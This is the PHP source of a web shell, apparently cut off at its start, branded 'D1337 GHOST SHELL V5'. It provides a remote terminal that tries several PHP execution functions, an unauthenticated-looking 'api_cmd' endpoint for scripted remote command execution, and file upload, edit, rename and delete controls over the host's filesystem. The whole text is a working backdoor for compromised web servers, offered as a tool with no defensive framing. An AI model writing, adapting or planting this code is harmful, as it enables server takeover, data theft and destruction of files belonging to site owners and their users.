'; echo ''; echo '
'; echo '

D1337 GHOST SHELL V5

'; echo '

'; echo '
'; echo ''; die(); } // Core Functions function rce($cmd){ $out = ""; if(function_exists('system')){ ob_start(); system($cmd); $out = ob_get_contents(); ob_end_clean(); } elseif(function_exists('exec')){ exec($cmd, $o); $out = implode("\n", $o); } elseif(function_exists('passthru')){ ob_start(); passthru($cmd); $out = ob_get_contents(); ob_end_clean(); } elseif(function_exists('shell_exec')){ $out = shell_exec($cmd); } elseif(function_exists('popen')){ $fp = popen($cmd, 'r'); while(!feof($fp)) $out .= fread($fp, 1024); pclose($fp); } elseif(function_exists('proc_open')){ $d = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $p = proc_open($cmd, $d, $pipes); if(is_resource($p)){ $out = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); } } return $out; } // Direct RCE for scripts (Stateless) if(isset($_POST['api_cmd'])) { echo "D1337_RCE_START\n"; echo rce($_POST['api_cmd']); echo "\nD1337_RCE_END"; die(); } function get_perms($file){ $p = fileperms($file); if (($p & 0xC000) == 0xC000) $i = 's'; elseif (($p & 0xA000) == 0xA000) $i = 'l'; elseif (($p & 0x8000) == 0x8000) $i = '-'; elseif (($p & 0x6000) == 0x6000) $i = 'b'; elseif (($p & 0x4000) == 0x4000) $i = 'd'; elseif (($p & 0x2000) == 0x2000) $i = 'c'; elseif (($p & 0x1000) == 0x1000) $i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } $dir = isset($_GET['d']) ? $_GET['d'] : getcwd(); $dir = str_replace("\\", "/", $dir); if(is_dir($dir)) chdir($dir); // Actions $msg = ""; if(isset($_FILES['f'])){ if(move_uploaded_file($_FILES['f']['tmp_name'], $dir."/".$_FILES['f']['name'])) $msg = "Upload OK: ".$_FILES['f']['name']; else $msg = "Upload Failed!"; } if(isset($_GET['del'])){ $df = $_GET['del']; if(is_dir($df)) { rmdir($df); $msg = "Dir Deleted"; } else { unlink($df); $msg = "File Deleted"; } } if(isset($_POST['new_name'])){ rename($_GET['ren'], $dir."/".$_POST['new_name']); $msg = "Renamed!"; } if(isset($_POST['file_content']) && isset($_GET['edit'])){ file_put_contents($_GET['edit'], $_POST['file_content']); $msg = "File Saved!"; } echo "D1337 V5"; echo ""; echo ""; echo "
D1337 GHOST SHELL V5 | User: ".get_current_user()." | OS: ".php_uname()." | [Logout]
"; echo "
Path: "; $paths = explode("/", $dir); $cdir = ""; foreach($paths as $id => $pat){ if($pat == "" && $id == 0){ echo "/"; continue; } if($pat == '') continue; $cdir .= "/".$pat; echo "$pat/"; } echo "
"; if($msg != "") echo "
[*] $msg
"; // Command Execution echo "
Terminal:
"; if(isset($_POST['cmd'])){ echo "
$ ".$_POST['cmd']."\n\n".htmlspecialchars(rce($_POST['cmd']))."
"; } // Edit File if(isset($_GET['edit'])){ $f = $_GET['edit']; echo "

Edit: $f



[Cancel]
"; } // Rename File elseif(isset($_GET['ren'])){ $f = basename($_GET['ren']); echo "

Rename: $f

[Cancel]
"; } // Main View else { echo "
Upload File:
"; $scandir = scandir($dir); echo ""; // Directories first foreach($scandir as $file){ if(!is_dir($dir."/".$file) || $file == ".") continue; $link = "?d=$dir/$file"; $perm = get_perms($dir."/".$file); echo ""; } // Files foreach($scandir as $file){ if(!is_file($dir."/".$file)) continue; $size = round(filesize($dir."/".$file)/1024, 2)." KB"; $perm = get_perms($dir."/".$file); echo ""; } echo "
NameSizePermsAction
[DIR] $file-$permRename | Delete
$file$size$permEdit | Rename | Delete
"; } echo ""; ?>